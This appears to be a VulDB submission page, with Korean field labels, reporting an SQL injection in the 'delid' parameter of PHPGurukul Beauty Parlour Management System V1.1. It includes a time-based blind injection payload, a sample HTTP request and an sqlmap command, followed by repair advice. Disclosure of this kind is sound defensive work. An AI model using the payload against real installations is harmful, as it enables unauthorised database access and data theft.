| 제목 | PHPGurukul Beauty Parlour Management System V1.1 SQL Injection |
|---|
| 설명 | ## NAME OF AFFECTED PRODUCT(S)
- Beauty Parlour Management System
## Vendor Homepage
- https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/
## AFFECTED AND/OR FIXED VERSION(S)
### submitter
- Li Hu
- [email protected]
- School of Cyberscience, University of Science and Technology of China
### Vulnerable File
- /admin/customer-list.php
### VERSION(S)
- V1.1
### Software Link
- https://phpgurukul.com/?sdm_process_download=1&download_id=10611
## PROBLEM TYPE
### Vulnerability Type
- SQL injection
### Root Cause
- A SQL injection vulnerability was identified within the "/admin/customer-list.php" file of the "Beauty Parlour Management System" project. The root cause lies in the fact that attackers can inject malicious code via the parameter "delid". This input is then directly utilized in SQL queries without undergoing proper sanitization or validation processes. As a result, attackers are able to fabricate input values, manipulate SQL queries, and execute unauthorized operations.
### Impact
- Exploiting this SQL injection vulnerability allows attackers to gain unauthorized access to the database, cause sensitive data leakage, tamper with data, gain complete control over the system, and even disrupt services. This poses a severe threat to both the security of the system and the continuity of business operations.
## DESCRIPTION
- During the security assessment of "Beauty Parlour Management System", I detected a critical SQL injection vulnerability in the "/admin/customer-list.php" file. This vulnerability is attributed to the insufficient validation of user input for the "delid" parameter. This inadequacy enables attackers to inject malicious SQL queries. Consequently, attackers can access the database without proper authorization, modify or delete data, and obtain sensitive information. Immediate corrective actions are essential to safeguard system security and uphold data integrity.
## No login or authorization is required to exploit this vulnerability
## Vulnerability details and POC
### Vulnerability location:
- "delid" parameter
### Payload:
```bash
Parameter:delid(GET)
Type: time-based blind
Title: MySOL>=5.0.12 RLIKE time-based blind(query SLEEP)
Payload: delid=10' RLIKE (SELECT 2249 FROM (SELECT(SLEEP(5)))pzgV)-- tkhW
```
### Vulnerability Request Packet
```txt
GET /1/bpms/admin/customer-list.php?delid=10 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=n11ldb2a9k2k7539qsd6c5usit
Upgrade-Insecure-Requests: 1
Priority: u=0, i
```
### The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
python sqlmap.py -r payload.txt --batch --level 3
```
<img width="1255" height="583" alt="Image" src="https://github.com/user-attachments/assets/84afbd4b-170e-48ff-a8e7-c904ec43772a" />
## Suggested repair
1. **Employ prepared statements and parameter binding:**
Prepared statements serve as an effective safeguard against SQL injection as they segregate SQL code from user input data. When using prepared statements, user - entered values are treated as mere data and will not be misconstrued as SQL code.
2. **Conduct input validation and filtering:**
Rigorously validate and filter user input data to guarantee that it conforms to the expected format. This helps in blocking malicious input.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has only the minimum required permissions. Avoid using accounts with elevated privileges (such as 'root' or 'admin') for day - to - day operations. |
|---|
| 원천 | ⚠️ https://github.com/f000x0/cve/issues/3 |
|---|
| 사용자 | Li Hu (UID 89284) |
|---|
| 제출 | 2025. 09. 30. AM 09:34 (7 개월 ago) |
|---|
| 모더레이션 | 2025. 10. 07. PM 12:54 (7 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 327351 [PHPGurukul Beauty Parlour Management System 1.1 /admin/customer-list.php delid SQL 주입] |
|---|
| 포인트들 | 20 |
|---|